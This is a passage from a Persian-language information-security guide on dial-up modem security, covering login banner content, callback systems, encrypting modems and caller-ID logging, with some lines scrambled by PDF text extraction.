Bannerﭘﻴﺎﻣﻲ ﺍﺳﺖ ﻛﻪ ﻭﻗﺘﻲ ﺑﺎ ﻳﻚ ﻣﻮﺩﻡ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ،ﺗﻮﺳﻂ ﺁﻥ ﻣﻮﺩﻡ )ﻳﺎ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻮﺩﻡ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﺍﺳﺖ( ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ
ﻣﻲﺁﻳﺪ .ﺑﺮﺧﻲ ﺍﺯ bannerﻫﺎ ﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﭼﻴﺰﻱ ﺗﺎﻳﭗ ﻛﻨﺪ ﻧﻤﺎﻳﺶ ﺩﺍﺩﻩ ﻣﻲﺷﻮﻧﺪ؛ ﻭ ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﺯﻣﺎﻧﻲ ﺑـﻪ ﻧﻤـﺎﻳﺶ ﺩﺭ
ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺑﺎ ﻣﻮﻓﻘﻴﺖ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﮔﺮﺩﺩ.
Bannerﻫﺎ ﺑﻪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﮔﺎﻥ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﻣﺘﺼﻞ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﻛـﺎﺭﺑﺮﺩ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑﻬﺒـﻮﺩ
ﻣﻲﺑﺨﺸﻨﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﺁﻧﻬﺎ ﻫﺮﮔﻮﻧﻪ ﻫﺸﺪﺍﺭ ﻳﺎ ﺍﺑﻼﻏﻴﻪ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﻧﻴﺰ ﻗﺮﺍﺭ ﺩﺍﺩ .ﺍﻣﺎ ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ bannerﻫﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻛـﺎﺭ
ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﻧﻴﺰ ﺳﺎﺩﻩﺗﺮ ﻛﻨﻨﺪ ،ﭼﺮﺍﻛﻪ ﻣﻬﺎﺟﻤﺎﻧﻲ ﻛﻪ ﺗﻤﺎﻡ ﺗﻠﻔﻨﻬﺎﻱ ﻳﻚ ﻣﻨﻄﻘﻪ ﻳﺎ ﺷﻬﺮ ﺭﺍ ﭘﻮﻳﺶ ﻣﻲﻛﻨﻨﺪ ،ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﺭﻭﻱ bannerﻫﺎ
ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻛﻪ ﺷﻤﺎﺭﺓ ﻣﻮﺩﻡ ﭼﻪ ﺳﺎﺯﻣﺎﻧﻲ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻩﺍﻧﺪ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺯ ﺁﻭﺭﺩﻥ ﻧﺎﻡ ﺳﺎﺯﻣﺎﻥ ،ﺷﻤﺎﺭﻩﺗﻠﻔﻨﻬﺎﻱ ﺁﻥ ،ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﺗﻤﺎﺱ،
٣٧٩ ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻭ ﻳﺎ ﻫﺮ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻳﺎﻧﺔ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩ ﺩﺭ bannerﺧﻮﺩﺩﺍﺭﻱ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳﺪ ﺍﺯ ﻛﻠﻤﺎﺗﻲ ﻛﻪ ﺑﻪ
ﻫﺮ ﺻﻮﺭﺕ ﻣﻌﻨﺎﻱ "ﺧﻮﺵﺁﻣﺪﮔﻮﻳﻲ" ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ ،ﭼﺮﺍﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺯ ﻧﻈـﺮ ﻗـﺎﻧﻮﻧﻲ ﺑﻌﻨـﻮﺍﻥ ﺩﻋـﻮﺕ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ
ﻼ ﭘﻴﺸﻨﻬﺎﺩﺍﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﭽﻪ ﻛﻪ ﺑﺎﻳﺪ ﺩﺭ bannerﻗﺮﺍﺭ ﮔﻴﺮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ:
ﻏﻴﺮﻣﺠﺎﺯ ﺑﺤﺴﺎﺏ ﺁﻳﻨﺪ .ﺫﻳ ﹰ
ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﻛﻪ ﻫﺮﮔﻮﻧﻪ ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺳﻴﺴﺘﻢ ﻣﻤﻨﻮﻉ ﺍﺳﺖ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭﮔﻴﺮﺩ) .ﺍﻋﻼﻡ ﻧﻜﻨﻴﺪ ﻛﻪ •
ﺍﺳﺘﻔﺎﺩﺓ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﺣﺘﻤﹰﺎ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﻭ ﺑﺮﺧﻲ ﻗﺮﺍﺭ ﻧﮕﻴﺮﻧﺪ ،ﺁﻧﻬﺎ
ﻛﻪ ﺗﺤﺖ ﭘﻴﮕﺮﺩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺴﺒﺖ ﺑﻪ ﺍﻋﻤﺎﻝ ﺍﻧﺘﺨﺎﺑﻲ ﺍﻳﻦ ﺳﻴﺎﺳﺖ ﻋﻠﻴﻪ ﺧﻮﺩ ﺍﺯ ﺷﻤﺎ ﺷﻜﺎﻳﺖ ﻛﻨﻨﺪ(.
ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﻛﻪ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺳﻴﺴﺘﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ. •
ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻋﻼﻡ ﻛﻨﻴﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺴﺘﻢ ،ﺩﺭ ﺣﻘﻴﻘﺖ ﭘﺬﻳﺮﻓﺘﻪﺍﻧﺪ ﻛﻪ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﻭ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺍﺯ •
ﺷﺮﺍﻳﻂ ﻛﺎﺭ ﺑﺎ ﺳﻴﺴﺘﻢ ﺍﺳﺖ.
ﺩﺭ ﺑﺮﺧﻲ ﺷﺮﺍﻳﻂ ﺑﻬﺘﺮ ﺍﺳﺖ ﻫﻴﭻ bannerﺧﻮﺵﺁﻣﺪﮔﻮﻳﻲ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻧﻴﺎﻳﺪ. •
ﻃﺮﺣﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻣﺮﻭﺯﻱ ﺗﻠﻔﻦ ،ﺍﮔﺮ ﻣﻮﺩﻡ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﻳﻚ ﺧﻂ ﺗﻠﻔﻦ ﺧﺎﺭﺟﻲ ﻣﺘﺼﻞ ﻛﻨﻴﺪ ،ﻫﺮ ﻓﺮﺩﻱ ﺩﺭ ﺟﻬﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺁﻥ ﺗﻤﺎﺱ
ﻻ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭﺑﮕﻴﺮﺩ .ﻫﺮﭼﻨﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺩﺭﺟﻪﺍﻱ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ ،ﺍﻣﺎ ﺍﺷﺘﺒﺎﻩﻧﺎﭘﺬﻳﺮ ﻧﻴﺴﺘﻨﺪ .ﻛـﺎﺭﺑﺮﺍﻥ ﻣﻌﻤـﻮ ﹰ
ﺿﻌﻴﻒ ﺍﻧﺘﺨﺎﺏ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﺣﺘﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻣﻨﺎﺳﺐ ﻧﻴﺰ ﺑﻌﻀﹰﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺍﺑﺰﺍﺭ ﻣﺨﺼﻮﺹ ﻛﺸﻒ ﻭ ﻳﺎ ﺣﺪﺱ ﺯﺩﻩ ﺷﻮﻧﺪ .ﺑﻪ ﻫﻤﻴﻦ
ﺩﻟﻴﻞ ﺍﻧﻮﺍﻉ ﺧﺎﺻﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻭ ﺭﻭﺷﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻏﻴﺮﻣﺠـﺎﺯ ﺣﻔﺎﻇـﺖ ﺑﻴـﺸﺘﺮﻱ
ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﺩ.
ﻧﺤﻮﻱ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﺪ ،ﻭ ﺳﭙﺲ ﺳﻴﺴﺘﻢ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﻗﻄﻊ ﻣﻲﻛﻨﺪ ﻭ ﺍﺯ ﻃﺮﻳﻖ ﻳـﻚ ﺷـﻤﺎﺭﺓ ﺍﺯ ﭘـﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ ﺑـﺎ ﺁﻥ
ﺷﺨﺺ ﺗﻤﺎﺱ ﻣﻲﮔﻴﺮﺩ .ﺍﻳﻦ ﺭﻭﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ ،ﭼﺮﺍﻛﻪ ﺳﻴﺴﺘﻢ ﺗﻨﻬﺎ ﺑﺎ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺍﺯ ﭘﻴﺶ ﺗﺄﻳﻴﺪﺷﺪﻩ ﺗﻤﺎﺱ ﺧﻮﺍﻫـﺪ
ﻻ ﺗﻌﺪﺍﺩ ﺷـﻤﺎﺭﻩﻫـﺎﻳﻲ ﻛـﻪ ﺩﺭ
ﮔﺮﻓﺖ ﻭ ﻟﺬﺍ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺨﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻭﺍﺩﺍﺭ ﻛﻨﻨﺪ ﻛﻪ ﺑﺎ ﻣﻮﺩﻡ ﺁﻧﻬﺎ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﺪ .ﻣﻌﻤﻮ ﹰ
ﺑﻴﺸﺘﺮ ﻣﻮﺩﻣﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺫﺧﻴﺮﻩ ﺷﻮﻧﺪ ﻣﺤﺪﻭﺩ ﺍﺳﺖ.
ﻼ ﻗﻄـﻊ ﻛﻨﻨـﺪ ،ﺍﻣـﺎ ﺑـﺎ ﻛﻤـﺎﻝ
ﺑﺮﺍﻱ ﺻﺤﺖ ﻋﻤﻠﻜﺮﺩ ،ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﻤﺎﺱ ﺑﺎﺯﮔﺸﺘﻲ ﺑﺎﻳﺪ ﺗﻤﺎﺱ ﻭﺍﺭﺩﻩ ﺭﺍ ﭘﻴﺶ ﺍﺯ ﻫﺮ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﻛﺎﻣ ﹰ
ﻧﺎﺑﺎﻭﺭﻱ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ ،ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻬﺘﺮ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ ﻛـﻪ ﺑـﺮﺍﻱ ﺗﻤﺎﺳـﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻃـﺮﻑ
ﺳﺎﺯﻣﺎﻥ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺷﻮﺩ ،ﺍﺯ ﻣﺠﻤﻮﻋﻪ ﻣﻮﺩﻣﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻧﺴﺒﺖ ﺑﻪ ﺗﻤﺎﺳﻬﺎﻱ ﻭﺍﺭﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﮔﺮﺩﺩ.
ﺍﻣﻜﺎﻥ ﺧﺮﺍﺑﻜﺎﺭﻱ ﺩﺭ ﺳﻴﺴﺘﻢ ﺗﻤﺎﺱ ﺑﺎﺯﮔﺸﺘﻲ ﻛﻪ ﺍﺯ ﺩﻭ ﻣﺠﻤﻮﻋﻪ ﻣﻮﺩﻡ ﻣﺨﺘﻠﻒ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﺪ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﻭﺍﺭﺩ .ﺍﮔـﺮ ﻣﻬـﺎﺟﻢ ﺳـﻮﺋﻴﭻ
ﺷﺮﻛﺖ ﺗﻠﻔﻦ ﺭﺍ ﺩﺳﺘﻜﺎﺭﻱ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﺭﻭﻱ ﺷﻤﺎﺭﻩﻫﺎﻳﻲ ﻛﻪ ﻣﻮﺩﻡ ﺑـﺮﺍﻱ ﺗﻤـﺎﺱ ﺑـﺎ ﺁﻧﻬـﺎ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ ﺷـﺪﻩ ،ﻳـﻚ ﺳﻴـﺴﺘﻢ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٨٠
ﻫﺪﺍﻳﺖ ﺗﻤﺎﺱ ٢٣٨ﻧﺼﺐ ﻛﻨﺪ ﻭ ﺗﻤﺎﺳﻬﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﺭﺍ ﺑﻪ ﻣﻮﺩﻡ ﺧﻮﺩ ﻣﻨﺘﻘﻞ ﻧﻤﺎﻳﺪ .ﺗﻤﺎﺳﻬﺎﻱ ﺑﺎﺯﮔﺸﺘﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﻣﻨﻴﺖ ﻛﻠـﻲ ﺳﻴـﺴﺘﻢ ﺭﺍ
ﺗﻘﻮﻳﺖ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﻧﺒﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﺍﺑﺰﺍﺭ ﺍﺻﻠﻲ ﺣﻔﻆ ﺍﻣﻨﻴﺖ ﺑﺮ ﺁﻧﻬﺎ ﺗﻜﻴﻪ ﻛﺮﺩ.
ﻣﻮﺩﻣﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭ
ﺍﻳﻦ ﻣﻮﺩﻣﻬﺎ ﻛﻪ ﺑﺎﻳﺪ ﺟﻔﺖﺟﻔﺖ ﺑﻜﺎﺭ ﺭﻭﻧﺪ ،ﻛﻠﻴﺔ ﺍﻃﻼﻋﺎﺕ ﺍﺭﺳﺎﻟﻲ ﻭ ﺩﺭﻳﺎﻓﺘﻲ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ .ﻣﻮﺩﻣﻬـﺎﻱ
ﺭﻣﺰﮔﺬﺍﺭ ﺩﺭﺟﺔ ﺑﺎﻻﻳﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺭﺍ -ﻧﻪ ﺗﻨﻬﺎ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻗﺼﺪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺍﺭﻧﺪ ،ﺑﻠﻜـﻪ ﺣﺘـﻲ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺍﺳـﺘﺮﺍﻕﺳـﻤﻊ
ﺗﻠﻔﻨﻲ ﺍﺯ ﺭﻭﻱ ﺳﻴﻢ ﺍﻧﺘﻘﺎﻝ -ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ .ﺑﺮﺧﻲ ﻣﻮﺩﻣﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭ ﺣﺎﻭﻱ ﻛﻠﻴﺪ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﺍﺯ ﭘـﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ ﻫـﺴﺘﻨﺪ ﻛـﻪ ﺗﻨﻬـﺎ
ﻣﻲﺗﻮﺍﻧﺪ ﺑﺼﻮﺭﺕ ﺟﻔﺘﻲ ﺑﺎ ﻳﻚ ﻣﻮﺩﻡ ﺧﺎﺹ ﺩﻳﮕﺮ ﻛﺎﺭ ﻛﻨﺪ .ﺑﺮﺧﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﻛﻠﻴﺪﻫﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻃﺒـﻖ ﻳـﻚ ﺭﻭﺍﻝ ﻣـﺸﺨﺺ
ﺗﻐﻴﻴﺮ ﻳﺎﺑﻨﺪ ﺗﺎ ﺳﻄﺢ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ .ﻋﻠﻴﺮﻏﻢ ﺗﻤﺎﻡ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﻳﺪ ﮔﻔﺖ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﻣﻮﺩﻣﻬـﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ
ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭ -ﻣﺜﻞ SSHﺭﻭﻱ ﻳﻚ ﺍﺗﺼﺎﻝ - PPPﻭ ﻣﻮﺩﻣﻬﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻫﻢ ﺑﺪﺳﺖ ﺁﻭﺭﺩ.
٢٣٩
ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻨﺎﻃﻖ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻧﻮﻋﻲ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻨﻲ ﺍﺿﺎﻓﻪ ﺑﻪ ﻧﺎﻡ ﺳﺮﻭﻳﺲ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﺍﺯ ﻧـﺎﻡ ﺁﻥ
ﻻ ﺯﻣﺎﻧﻴﻜﻪ ﺗﻠﻔﻦ ﺷﺮﻭﻉ ﺑﻪ ﺯﻧﮓ ﺯﺩﻥ ﻣﻲﻛﻨﺪ ،ﺍﻳﻦ ﺷـﻤﺎﺭﺓ ﭘﻴﺪﺍ ﺍﺳﺖ ،ﺍﻳﻦ ﺳﺮﻭﻳﺲ ،ﺷﻤﺎﺭﺓ ﺗﻠﻔﻦ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﻛﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﺗﻠﻔﻦ ﺭﻭﻱ ﺻﻔﺤﺔ ﻛﻮﭼﻜﻲ ﺩﺭ ﻛﻨﺎﺭ ﺩﺳﺘﮕﺎﻩ ﺗﻠﻔﻦ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﻣﺴﺘﻘﻴﻤﹰﺎ ﻭﺍﺟﺪ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺷـﻤﺎﺭﻩ
ﻫﺴﺘﻨﺪ ،ﻭ ﭼﻨﺎﻧﭽﻪ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻭ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﻨﮕﺎﻣﻴﻜﻪ ﺷﻤﺎﺭﺓ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺩﺭﻳﺎﻓـﺖ ﻛﺮﺩﻧـﺪ ،ﺁﻧـﺮﺍ ﺩﺭ
ﺍﺧﺘﻴﺎﺭ ﺭﺍﻳﺎﻧﺔ ﻣﻴﺰﺑﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﺭﻭﺷﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺑﺮﺍﻱ ﻳﻜﭙﺎﺭﭼﻪ ﻛﺮﺩﻥ ﺳﺮﻭﻳﺲ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺑﺎ ﺧﺪﻣﺎﺕ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﺑﺮﺧﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﻧﺪ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺩﺭﻳﺎﻓﺖ •
ﻛﻨﻨﺪ ﻭ ﺍﻃﻼﻋﺎﺕ ﺁﻧﺮﺍ ﺩﺭ ﻛﻨﺎﺭ ﺯﻣﺎﻥ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﻭ ﻧﺎﻡﻛﺎﺭﺑﺮﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﻪ ﺛﺒﺖ ﺑﺮﺳﺎﻧﻨﺪ .ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ
ﺩﻭﺭ ﻛﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺭﻭﻱ ISDNﻣﻌﻤﻮﻟﻲ ،ISDN PRI ،ﻭ ﻣﺪﺍﺭﻫﺎﻱ T1 Flex-Pathﻛﺎﺭ ﻛﻨﻨﺪ ،ﺩﺍﺭﺍﻱ
ﻗﺎﺑﻠﻴﺖ ﺛﺒﺖ ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺩﺭ ﻓﺎﻳﻠﻬﺎﻱ ٢٤٠RADIUSﻣﻲﺑﺎﺷﻨﺪ.
ﭘﺲ ﺍﺯ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ،ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺑﺮﺍﻱ ﺭﺩﻳﺎﺑﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﺮﺧﻼﻑ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ •
ﻋﺒﻮﺭ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻮﺳﻂ ﻳﻚ ﻓﺮﺩ ﻏﻴﺮﻣﺠﺎﺯ ﺩﺯﺩﻳﺪﻩ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﻧﺪ ،ﺍﻃﻼﻋﺎﺕ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺩﺭ ﺍﻛﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ
ﻣﻮﺍﺭﺩ ﻣﺸﺨﺺﻛﻨﻨﺪﺓ ﻣﻨﺒﻊ ﻭﺍﻗﻌﻲ ﺣﻤﻠﻪ ﻣﻲﺑﺎﺷﺪ.
ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺷﻤﺎ ﻓﺎﻗﺪ ﻗﺎﺑﻠﻴﺖ ﻫﻮﻳﺖ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﻩ ﺍﺳﺖ ،ﻣﻲﺗﻮﺍﻧﻴﺪ ﺭﻭﻱ ﻫﻤﺎﻥ ﺧﻂ ﻳﻚ ﻣﻮﺩﻡ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ •
